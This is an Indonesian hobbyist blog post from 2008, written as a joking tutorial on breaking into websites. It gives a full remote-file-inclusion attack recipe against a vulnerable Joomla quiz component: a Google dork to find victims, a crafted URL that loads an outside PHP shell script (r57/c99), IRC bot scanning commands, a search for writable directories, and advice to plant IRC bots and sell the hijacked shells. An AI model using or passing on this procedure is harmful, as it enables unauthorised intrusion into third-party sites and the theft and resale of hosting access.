Senin, 26 Mei 2008

Tutor Sederhana Inject Web

Alo bro, para dekater`s ( penghuni room #dkt Allnetwork ) pa kabar kalian ?? moga - moga baek dan selalu dalam lindungan Tuhan, amien. Ok man, tanpa basa - basi kita langsung aja meluncur ke TKP. Kali ini kita coba untuk mengulas cara sederhana untuk me- Inject Web ato dalam basa bule nya Steal Webhosting ( Tukang Maling Cd/ Jemuran Orang ) gitu kali ya kalo di indonesiakan :D

Ok bro, kita langsung ke Tutor Cara Pengerjaannya ada 3 tahap ( pemanasan, inti, dan pendinginan ) :

Tahap 1 " pemanasan "
  1. Siapakan secangkir kopi panas / hangat ( sesuai selera kamu )
  2. 1 pak rokok ( kalo g punya ngecer jg gpp ato nge-bon ke warung sebelah )
  3. Ambil nafas dalam - dalam ( tujuan untuk menguatkan otak dan otot jantung ) tahan dan kalo bisa jangan di hembuskan :D kalo kalian pengen berhenti di point 3 ini hehehehe.. ok next
  4. Pastikan ada cewek cantik disamping kamu agar lebih pe`de dan jg kalo capek ato pusing itung - itung ada tukang pijat gratis aw..aw..aw... Kita lanjut ke tahap berikutnya yaitu :
Tahap 2 " inti "
  1. Persiapkan Browser " Mozilla Firefox " kalo g ada kalian bisa donlot ( wajib pake browser ini karena Inject Web ga akan jalan kalo pake browser selain Mozilla, alasan yang masuk akal kan ?? ) :D
  2. Buka situs .com
  3. klik "web apps" atau search dengan ketik File Include / File Inclusion Vulnerability / Include Vulnerabilities"
  4. Misal kita buka http://www.milw0rm.com/exploits/5345
  5. disitu ada tulisan [o] Exploit http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] berarti software tersebut adalah joomla onlineflashquiz yamg memiliki vuln pada "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=" dan [evilcode] yang dimaksud adalah scripts setan shells php,kamu bisa pake scripts kamu sendiri atau cari di mbah google.
  6. buka Mbah Google memakai mozilla firefox,lalu ketik di kolom search "inurl:option,com_onlineflashquiz"
  7. akan muncul daftar nama2 situs yang memakai software joomla onlineflashquiz yaitu "com_onlineflashquiz"
  8. ambilah salah satu dari sebuah situs tersebut nama webnya aja. misalnya http://grandong.com/index.php?option=com_onlineflashquiz&task=1 ambilah nama web domainnnya aja menjadi http://grandong.com/
  9. lalu buka browser baru dan kopi paste web tadi
  10. sambungkan dengan software yang vuln diatas sehingga menjadi http://grandong.com/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
  11. sambungkan lagi dengan scripts shell kamu,terserah pake r57,c99 atau shells setan. Misalnya alamat scripts setan kamu "http://ibliz.net/scripts/setan.txt"
  12. sehingga web diatas bisa diinjek melalui browser mozilla firefox dengan alamat lengkapnya

    "http://grandong.com/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://ibliz.net/scripts/setan.txt?"

    Mengapa memakai tanda ? disetiap akhiran,karena itu bertujuan agar lebih safe aja,gak usah pake tanda ? juga gak apa kok.
  13. Kalo gak pingin capek2 cari injekan,kamu bisa join di channel MIRC/IRC yang mempunyai bot scan
  14. jadi kita tinggal scan sambil chatingan,biar bot scan aja yang mencari injekan kita ( mudah bukan ? )
  15. cara pake bot scan biasanya pake perintah !scan [vuln] [dork] atau `scan [vuln] [dork]
  16. [vuln] adalah path injekan diatas "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir="
    [dork] adalah kata kunci untuk mencari pada situs "inurl:com_onlineflashquiz"
  17. jadi kita scan pake perintah !scan component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir= inurl:com_onlineflashquiz
  18. sampe disini artikel yang bisa aku berikan,kalo masih bingung pegangan pada tembok atau pagar di depan rumah kamu
  19. Ucapan Selamat dari kita " kamu sukses untuk menjadi maling ! "
Tahap 3 " Pendinginan "
  1. Kalo kamu sudah mendapatkan target, cari direktory yang tidak permision denied / direktory yang bisa di upload dengan mengetik " find / -type d -perm 777 "
  2. kamu bisa bikin eggdrop ato psy disitu ( kalo shell nya support ) cara bikinnya liat arcive di blog ini pada bulan februari di situ kita bahas mengenai ini.
  3. Kejar cewek yang dampingin kamu tadi, yang pasti dah tinggalin kamu karena itu resikonya pecinta dunia maya/komputer
  4. Ajakin kencan cewek kamu tadi ( dinner ato ngapain aja terserah kamu )
  5. Kalo g punya uang, tenang bro kalian punya deposito yang tidak kalian sadari, jual psy ato shell injekan kamu tadi dapet dech duit buat kencan !!! huakakakkaka....
Sekian dulu sedikit informasi dari kita semoga bermanfaat dan keep comments. Untuk kritik dan saran kalian bisa kirim pada shoutbox

copyright by http://www.dekate.co.cc/